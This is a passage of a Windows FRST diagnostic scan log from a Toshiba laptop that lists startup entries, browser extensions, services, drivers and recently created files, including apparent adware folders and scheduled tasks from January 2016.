(Webroot Software, Inc.) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe (Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe (TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe (Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe (Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe (TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe (Coupons.com Inc.) C:\Program Files (x86)\Coupons\CouponPrinterService.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SSU.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [] => [X] HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7220768 2009-03-12] (Realtek Semiconductor) HKLM\...\Run: [skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-03-12] (Realtek Semiconductor Corp.) HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1713448 2009-03-18] (Synaptics Incorporated) HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [487264 2009-03-06] (TOSHIBA Corporation) HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation) HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-12-18] (TOSHIBA Corporation) HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [900096 2009-03-23] (TOSHIBA Corporation) HKLM\...\Run: [ThpSrv] => "C:\Windows\system32\thpsrv" /logon HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1451520 2009-04-14] (TOSHIBA Corporation) HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [236544 2009-03-24] (TOSHIBA Corporation) HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation) HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe [1123840 2009-03-24] (TOSHIBA Corporation) HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation) HKLM\...\Run: [LXCYCATS] => "rundll32" \3\LXCYtime.dll,RunDLLEntry HKLM-x32\...\Run: [TUSBSleepChargeSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA USB Sleep and Charge Utility\TUSBSleepChargeSrv.exe [252288 2009-03-27] (TOSHIBA) HKLM-x32\...\Run: [PCMAgent] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe [143360 2009-02-16] (CyberLink Corp.) HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe [196608 2009-02-16] (CyberLink) HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [61440 2009-04-22] (Advanced Micro Devices, Inc.) HKLM-x32\...\Run: [NDSTray.exe] => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [304496 2009-03-17] (TOSHIBA CORPORATION) HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2513472 2009-04-16] (TOSHIBA) HKLM-x32\...\Run: [spySweeper] => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [6515784 2009-11-06] (Webroot Software, Inc.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-11-18] (Google Inc.) HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\MountPoints2: {78e8348c-a981-11e4-be0a-001e33cd3101} - F:\LaunchU3.exe -a ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: 0.0.0.1 mssplus.mcafee.com Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 Tcpip\..\Interfaces\{0D4D3689-2B0A-4854-86AC-74893CC38CA5}: [DhcpNameServer] 192.168.1.254 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://att.yahoo.com/ HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={E21F1955-857E-42DF-B279-D58E6B168B3C} SearchScopes: HKLM -> DefaultScope {C24898BE-DF94-459B-96E9-3B0EA8BD61C1} URL = SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage} SearchScopes: HKU\.DEFAULT -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = SearchScopes: HKU\.DEFAULT -> {9F6F6BFF-5270-44E3-8D40-0F2D89A64F42} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=WBR&o=13993&src=kw&q={searchTerms}&locale=en_US&apn_ptnrs=^W5&apn_dtid=^YYYYYY^YY^US&apn_uid=1C0E9576-C62B-4A47-ABAA-A8CAF89B7691&apn_sauid=BC87ED7E-5FF1-4904-A76C-FAE6DCFDD564 SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> {61C6D6B3-6D52-43B0-BD8F-D5AA7A1E923E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11569 BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) BHO-x32: Lexmark Toolbar -> {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -> C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] () BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.) BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.) BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.) Toolbar: HKLM-x32 - Lexmark Toolbar - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] () Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.) Toolbar: HKU\.DEFAULT -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - No File Toolbar: HKU\.DEFAULT -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.) Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File FireFox: ======== FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441 FF DefaultSearchEngine.US: Google FF SelectedSearchEngine: Default FF Homepage: www.google.com FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-20] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-20] () FF Plugin-x32: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa2.dll [2008-08-20] (Google, Inc.) FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa3.dll [2015-02-13] (Google, Inc.) FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-06] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-06] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2015-05-18] (Coupons, Inc.) FF Extension: Search Web Know - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\Extensions\{c220f16f-ba07-4e7e-98e9-662f66164d42}.xpi [2016-01-22] [not signed] FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2014-11-18] [not signed] ==================== Services (Whitelisted) ======================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 camsvc; C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe [20544 2009-04-16] (TOSHIBA) R2 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2009-03-06] (TOSHIBA CORPORATION) [File not signed] R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [1414128 2015-05-18] (Coupons.com Inc.) S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed] R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed] S3 lxcy_device; C:\Windows\system32\lxcycoms.exe [465408 2006-02-20] ( ) S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes) S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.) R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation) R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation) R2 RSELSVC; C:\Program Files\TOSHIBA\rselect\RSelSvc.exe [55808 2009-02-19] (TOSHIBA Corporation) [File not signed] R2 TNaviSrv; C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2009-03-30] (TOSHIBA Corporation) R2 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed] R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [251392 2009-04-14] (TOSHIBA Corporation) [File not signed] R2 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [84480 2009-03-17] (TOSHIBA Corporation) [File not signed] R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation) R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2014-11-18] (Webroot Software, Inc. ) ===================== Drivers (Whitelisted) ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation) R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation) R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation) R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com)) S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2016-01-23] () S3 IpInIp; system32\DRIVERS\ipinip.sys [X] S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X] S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-01-26 03:06 - 2016-01-26 03:06 - 00019243 _____ C:\Users\Barbara\Desktop\FRST.txt 2016-01-26 03:04 - 2016-01-26 03:06 - 00000000 ____D C:\FRST 2016-01-26 03:04 - 2016-01-25 13:24 - 02370560 _____ (Farbar) C:\Users\Barbara\Desktop\FRST64.exe 2016-01-23 18:13 - 2016-01-23 18:21 - 00076944 _____ C:\Windows\ntbtlog.txt 2016-01-23 17:05 - 2016-01-24 02:52 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2016-01-23 17:05 - 2016-01-23 17:05 - 00000952 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware 2016-01-23 17:05 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys 2016-01-23 17:05 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2016-01-23 17:05 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2016-01-23 17:02 - 2016-01-23 17:03 - 22908888 _____ (Malwarebytes ) C:\Users\Barbara\Downloads\mbam-setup-2.2.0.1024.exe 2016-01-23 16:24 - 2016-01-23 16:24 - 00003446 _____ C:\Windows\System32\Tasks\Brooucnejo 2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\WebBar 2016-01-23 16:19 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files\WebBar 2016-01-23 16:18 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\rqNhmm 2016-01-23 16:18 - 2016-01-23 18:06 - 00000000 ____D C:\ProgramData\CrimeWatch 2016-01-23 16:12 - 2014-08-18 15:51 - 00971576 ____N C:\Windows\system32\pmls64.dll 2016-01-23 16:12 - 2014-08-18 15:51 - 00660792 ____N C:\Windows\SysWOW64\pmls.dll 2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UpdateAdmin 2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care 2016-01-23 16:11 - 2016-01-23 18:07 - 00000000 ____D C:\Program Files (x86)\OneSystemCare 2016-01-23 16:11 - 2016-01-23 16:11 - 00023252 _____ C:\Windows\System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D} 2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-6363-0 2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-08c3-1 2016-01-23 16:10 - 2016-01-26 03:06 - 00000270 _____ C:\Windows\Tasks\PubMach138.job 2016-01-23 16:10 - 2016-01-23 23:38 - 00000274 _____ C:\Windows\Tasks\OutstandinDivisio6.job 2016-01-23 16:10 - 2016-01-23 19:43 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrazDivisio519 2016-01-23 16:10 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\NowUSeeItPlayer 2016-01-23 16:10 - 2016-01-23 18:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\RustiSens806 2016-01-23 16:10 - 2016-01-23 16:10 - 00003162 _____ C:\Windows\System32\Tasks\OutstandinDivisio6 2016-01-23 16:10 - 2016-01-23 16:10 - 00003154 _____ C:\Windows\System32\Tasks\PubMach138 2016-01-17 12:03 - 2015-12-08 12:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-01-17 12:03 - 2015-12-08 11:39 - 01065984 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 02873344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 01567744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01377792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01326080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 01114624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00767488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00759296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00605184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll 2016-01-17 11:58 - 2015-12-05 12:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL 2016-01-17 11:58 - 2015-12-05 12:03 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00613888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2VDEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ADEC.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax 2016-01-17 11:58 - 2015-12-05 12:02 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL 2016-01-17 11:58 - 2015-12-05 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll 2016-01-17 11:58 - 2015-12-05 12:02 - 00059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll 2016-01-17 11:58 - 2015-12-05 11:41 - 01886208 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01539072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01350656 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01127424 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 01090560 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll 2016-01-17 11:58 - 2015-12-05 11:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00819200 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00732160 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL 2016-01-17 11:58 - 2015-12-05 11:41 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 03548672 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 01571328 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00620544 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00352256 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00301056 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll 2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL 2016-01-17 11:58 - 2015-12-05 11:40 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL 